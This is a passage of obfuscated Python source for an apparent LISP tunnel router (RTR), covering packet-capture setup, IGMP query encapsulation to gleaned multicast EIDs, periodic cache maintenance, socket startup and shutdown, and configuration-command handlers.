i1iIIi1 = "lo0" if lisp . lisp_is_macos ( ) else "any"
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
IiI1iI1IiiIi1 = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
IiI1iI1IiiIi1 = ( IiI1iI1IiiIi1 != "" and IiI1iI1IiiIi1 [ 0 ] == " " )
if 90 - 90: O0 + I11i - OoooooooOO . I11i
oOII1ii1ii11I1 = "(dst host "
o0ooOO0o = ""
for iI1Iii in lisp . lisp_get_all_addresses ( ) :
oOII1ii1ii11I1 += "{} or " . format ( iI1Iii )
o0ooOO0o += "{} or " . format ( iI1Iii )
if 71 - 71: OoooooooOO
oOII1ii1ii11I1 = oOII1ii1ii11I1 [ 0 : - 4 ]
oOII1ii1ii11I1 += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOII1ii1ii11I1 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
o0ooOO0o = o0ooOO0o [ 0 : - 4 ]
oOII1ii1ii11I1 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( o0ooOO0o )
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if ( IiI1iI1IiiIi1 ) :
oOII1ii1ii11I1 += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( o0ooOO0o )
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
lisp . lprint ( "Capturing packets for: '{}'" . format ( oOII1ii1ii11I1 ) )
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if ( lisp . lisp_is_python2 ( ) ) :
oo0O0o = pcappy . open_live ( i1iIIi1 , 9000 , 0 , 100 )
oo0O0o . filter = oOII1ii1ii11I1
oo0O0o . loop ( - 1 , OoIIi1iI , [ i1iIIi1 , lisp_thread ] )
if 13 - 13: iIii1I11I1II1 . OoOoOO00 * I1IiiI / oO0o * Ii1I
if ( lisp . lisp_is_python3 ( ) ) :
oo0O0o = pcapy . open_live ( i1iIIi1 , 9000 , 0 , 100 )
oo0O0o . setfilter ( oOII1ii1ii11I1 )
while ( True ) :
O0OO0oOOo , iI11I = oo0O0o . next ( )
OoIIi1iI ( [ i1iIIi1 , lisp_thread ] , None , iI11I )
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
return
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
def iI1i1iIi1iiII ( lisp_raw_socket , eid , geid , igmp ) :
if 53 - 53: I11i
if 68 - 68: oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
iI11I = lisp . lisp_packet ( igmp )
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
o00oo0 = lisp . lisp_map_cache_lookup ( eid , geid )
if ( o00oo0 == None ) : return
if ( o00oo0 . rloc_set == [ ] ) : return
if ( o00oo0 . rloc_set [ 0 ] . rle == None ) : return
if 46 - 46: I1Ii111
o00OoooooooOo = eid . print_address_no_iid ( )
for iiIi1IIi1I in o00oo0 . rloc_set [ 0 ] . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name == o00OoooooooOo ) :
iI11I . outer_dest . copy_address ( iiIi1IIi1I . address )
iI11I . encap_port = iiIi1IIi1I . translated_port
break
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if ( iI11I . outer_dest . is_null ( ) ) : return
if 98 - 98: OoOoOO00 % II111iiii
iI11I . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
iI11I . outer_version = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_ttl = 32
iI11I . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
iI11I . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
iI11I . inner_ttl = 1
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
o000O0o = lisp . green ( eid . print_address ( ) , False )
O0ooOoO = lisp . red ( "{}:{}" . format ( iI11I . outer_dest . print_address_no_iid ( ) ,
iI11I . encap_port ) , False )
IiiIIi1 = lisp . bold ( "IGMP Query" , False )
if 28 - 28: o0oOOo0O0Ooo
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( IiiIIi1 , o000O0o , O0ooOoO ) )
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if ( iI11I . encode ( None ) == None ) : return
iI11I . print_packet ( "Send" , True )
if 14 - 14: I1ii11iIi11i + i11iIiiIii
iI11I . send_packet ( lisp_raw_socket , iI11I . outer_dest )
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
if 32 - 32: OoooooooOO . OoO0O00 / Oo0Ooo * o0oOOo0O0Ooo / o0oOOo0O0Ooo * Ii1I
if 19 - 19: Ii1I
if 55 - 55: OOooOOo % OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
def Iii ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 7 - 7: Oo0Ooo * OoooooooOO % O0 - Ii1I . Ii1I
if 80 - 80: OoOoOO00 - II111iiii
if 35 - 35: ooOoO0o - OoO0O00 . Oo0Ooo * Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
III1II1i = b"\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
iI1i1IiIIIIi = lisp . lisp_myrlocs [ 0 ]
Oo0OoO00oOO0o = iI1i1IiIIIIi . address
III1II1i += bytes ( [ ( Oo0OoO00oOO0o >> 24 ) & 0xff , ( Oo0OoO00oOO0o >> 16 ) & 0xff , ( Oo0OoO00oOO0o >> 8 ) & 0xff ,
Oo0OoO00oOO0o & 0xff ] )
III1II1i += b"\xe0\x00\x00\x01"
III1II1i += b"\x94\x04\x00\x00"
III1II1i = lisp . lisp_ip_checksum ( III1II1i , 24 )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
o000OOooo0O = b"\x11\x64\x00\x00" + b"\x00\x00\x00\x00" + b"\x02\x3c\x00\x00"
o000OOooo0O = lisp . lisp_igmp_checksum ( o000OOooo0O )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
for ooooo0Oo0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1OOO . store_address ( ooooo0Oo0 )
oO00oo0o00o0o , IiIIIIIi , o0 = lisp . lisp_allow_gleaning ( o00oO0oo0OO , i1OOO , None )
if ( o0 == False ) : continue
iI1i1iIi1iiII ( lisp_raw_socket , o00oO0oo0OO , i1OOO , III1II1i + o000OOooo0O )
if 9 - 9: I1Ii111 * Oo0Ooo + O0 - I1Ii111
if 73 - 73: iIii1I11I1II1
if 74 - 74: iII111i - I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
if 38 - 38: OoO0O00 / ooOoO0o % I1Ii111 * I11i + i11iIiiIii % ooOoO0o
if 61 - 61: I1Ii111 - Ii1I % I1ii11iIi11i / ooOoO0o / iII111i + iIii1I11I1II1
if 87 - 87: I1Ii111 + ooOoO0o + O0 / i1IIi % IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
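# Age out gleaned multicast groups: remove any (EID, group) entry that has not been refreshed
# within LISP_IGMP_TIMEOUT_INTERVAL.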
def O0000oO0o00 ( ) :
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 80 - 80: OoooooooOO + IiII
O00O = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for ooooo0Oo0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
Oo0oOOooO0o0O = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ ooooo0Oo0 ]
oo0o00oOo0 = time . time ( ) - Oo0oOOooO0o0O
if ( oo0o00oOo0 < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
O00O . append ( [ Ii1iIiII1ii1 , ooooo0Oo0 ] )
if 61 - 61: OOooOOo / OoO0O00 + II111iiii . oO0o / Oo0Ooo * OOooOOo
if 46 - 46: iIii1I11I1II1
if 33 - 33: I11i % I11i % O0 / I1IiiI . i1IIi
if 91 - 91: ooOoO0o * I11i - II111iiii . I1IiiI - Oo0Ooo + ooOoO0o
if 56 - 56: o0oOOo0O0Ooo / IiII * I1IiiI . o0oOOo0O0Ooo
if 15 - 15: i11iIiiIii
if 13 - 13: I11i * II111iiii * oO0o * II111iiii % IiII / I1IiiI
O0O = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , ooooo0Oo0 in O00O :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
i1OOO . store_address ( ooooo0Oo0 )
o000O0o = lisp . green ( Ii1iIiII1ii1 , False )
ooo = lisp . green ( ooooo0Oo0 , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( o000O0o , O0O , ooo ) )
lisp . lisp_remove_gleaned_multicast ( o00oO0oo0OO , i1OOO )
if 27 - 27: ooOoO0o + i11iIiiIii * I11i + OoOoOO00 + iII111i
if 87 - 87: O0
if 87 - 87: o0oOOo0O0Ooo / II111iiii
if 90 - 90: ooOoO0o - I1ii11iIi11i - O0 + Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
if 97 - 97: IiII . Ii1I . Ii1I / iIii1I11I1II1 - OoO0O00 + iII111i
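# Periodic maintenance routine, rearmed every 60 seconds: flush crypto keys cached by nonce, time out
# map-cache entries, clear the NAT-trace cache, age out gleaned groups, and send IGMP queries to gleaned EIDs.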
def II1 ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 52 - 52: OoOoOO00 * OoO0O00 - Ii1I
if 82 - 82: OoO0O00 + I1IiiI . i1IIi + OOooOOo
if 16 - 16: o0oOOo0O0Ooo - OoO0O00 / I1Ii111
if 48 - 48: iIii1I11I1II1
for oO0OOOO0 in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for OoooooOo in oO0OOOO0 : del ( OoooooOo )
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
O0000oO0o00 ( )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
Iii ( lisp_raw_socket )
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
oOOoo00O0O = threading . Timer ( 60 , II1 ,
[ lisp_raw_socket ] )
oOOoo00O0O . start ( )
return
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
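# RTR startup: determine local RLOCs (with AWS special-casing), open the control, IPC, raw-data, and trace
# sockets, spawn pcap and worker threads, load the map-cache checkpoint, and arm the 60-second maintenance timer.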
def I1ii1Ii1 ( ) :
global Ii1iI , Oo0o , I1Ii11I1Ii1i
global o0oOoO00o , i1 , O0ooo00OOo00
global Oo , OOO0o0o
global iIiiI1
if 73 - 73: O0 . oO0o + i11iIiiIii + iIii1I11I1II1 - I11i / OoOoOO00
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 99 - 99: I1ii11iIi11i * oO0o * I1ii11iIi11i - II111iiii + Ii1I
if 72 - 72: o0oOOo0O0Ooo % I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
III11I1 = lisp . bold ( "AWS RTR" , False )
Oo0OoO00oOO0o = None
for i1iIIi1 in [ "eth0" , "ens5" ] :
Oo0OoO00oOO0o = lisp . lisp_get_interface_address ( i1iIIi1 )
if ( Oo0OoO00oOO0o != None ) : break
if 61 - 61: OoOoOO00 - OoO0O00 + I1IiiI * OOooOOo % OoO0O00
if ( Oo0OoO00oOO0o != None ) :
iIiiI1 = Oo0OoO00oOO0o
iI1Iii = Oo0OoO00oOO0o . print_address_no_iid ( )
lisp . lprint ( "{} using RLOC {} on {}" . format ( III11I1 , iI1Iii , i1iIIi1 ) )
else :
iI1Iii = iIiiI1 . print_address_no_iid ( )
lisp . lprint ( "{} cannot obtain RLOC, using {}" . format ( III11I1 , iI1Iii ) )
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
Ii1 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( Ii1 ,
str ( Ooo ) )
Ii1iI = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
Oo = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 59 - 59: Oo0Ooo % O0 . OoOoOO00
Oo0o [ 0 ] = I1Ii11I1Ii1i
if 41 - 41: i1IIi + II111iiii * ooOoO0o
Oo0o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o [ 2 ] = Ii1iI
if 68 - 68: Ii1I - I1IiiI
if 41 - 41: oO0o
if 21 - 21: ooOoO0o + o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + II111iiii
if 98 - 98: I1Ii111
if 49 - 49: Oo0Ooo * oO0o + o0oOOo0O0Ooo - i11iIiiIii
if 74 - 74: Oo0Ooo / iIii1I11I1II1 . II111iiii - OoO0O00
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
o0oOoO00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
o0oOoO00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o . append ( o0oOoO00o )
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
OOO0o0o = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if ( lisp . lisp_is_raspbian ( ) == False ) :
i1 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
if 45 - 45: OoooooooOO
I1 = os . getenv ( "LISP_PCAP_THREADS" )
I1 = 1 if ( I1 == None ) else int ( I1 )
oo = os . getenv ( "LISP_WORKER_THREADS" )
oo = 0 if ( oo == None ) else int ( oo )
if 17 - 17: O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
for IIIi in range ( I1 ) :
III11IiiiIi1 = lisp . lisp_thread ( "pcap-{}" . format ( IIIi ) )
III11IiiiIi1 . thread_number = IIIi
III11IiiiIi1 . number_of_pcap_threads = I1
III11IiiiIi1 . number_of_worker_threads = oo
O0ooo00OOo00 . append ( III11IiiiIi1 )
threading . Thread ( target = Ooo0O , args = [ III11IiiiIi1 ] ) . start ( )
if 20 - 20: II111iiii - I11i + i1IIi + Ii1I
if 7 - 7: ooOoO0o + Ii1I
if 32 - 32: iIii1I11I1II1 % I1IiiI / i11iIiiIii + OOooOOo - o0oOOo0O0Ooo . iII111i
if 86 - 86: i1IIi / Ii1I * I1IiiI
if 67 - 67: I1ii11iIi11i * I1ii11iIi11i / oO0o * OoooooooOO + OoOoOO00
if 79 - 79: i1IIi
for IIIi in range ( oo ) :
III11IiiiIi1 = lisp . lisp_thread ( "worker-{}" . format ( IIIi ) )
O0ooo00OOo00 . append ( III11IiiiIi1 )
threading . Thread ( target = I1I1iII1i , args = [ III11IiiiIi1 ] ) . start ( )
if 1 - 1: oO0o / i1IIi
if 74 - 74: I11i / OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 98 - 98: oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
oOOoo00O0O = threading . Timer ( 60 , II1 ,
[ o0oOoO00o ] )
oOOoo00O0O . start ( )
return ( True )
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
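# RTR shutdown: close all control, IPC, data, and trace sockets.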
def ooOOO00oOOooO ( ) :
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
lisp . lisp_close_socket ( Oo0o [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o [ 1 ] , "" )
lisp . lisp_close_socket ( Ii1iI , "lisp-rtr" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
lisp . lisp_close_socket ( OOO0o0o , "" )
lisp . lisp_close_socket ( Oo , "lispers.net-itr" )
o0oOoO00o . close ( )
return
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
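# Handle the "lisp map-resolver" configuration command and schedule a test Map-Request to the
# configured map-resolvers if one is not already pending.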
def O00Ooo ( kv_pair ) :
global Oo0o
global Ooo
if 92 - 92: OoOoOO00 % O0
lispconfig . lisp_map_resolver_command ( kv_pair )
if 55 - 55: iIii1I11I1II1 * iII111i
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ Oo0o , Ooo ] )
lisp . lisp_test_mr_timer . start ( )
if 85 - 85: iIii1I11I1II1 . II111iiii
return
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
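# Handle the "lisp xtr-parameters" configuration command; if RLOC-probing was just enabled, start the
# RLOC-probe timer and push the ITR crypto port to the data plane, then write the xtr parameters over IPC.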
def ooIiI11i1I11111 ( kv_pair ) :
global I1Ii11I1Ii1i , o0oOoO00o , Ooo
if 34 - 34: I1IiiI * OoOoOO00 * oO0o + I1ii11iIi11i
II1i = lisp . lisp_rloc_probing
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
lispconfig . lisp_xtr_command ( kv_pair )
if 64 - 64: i1IIi
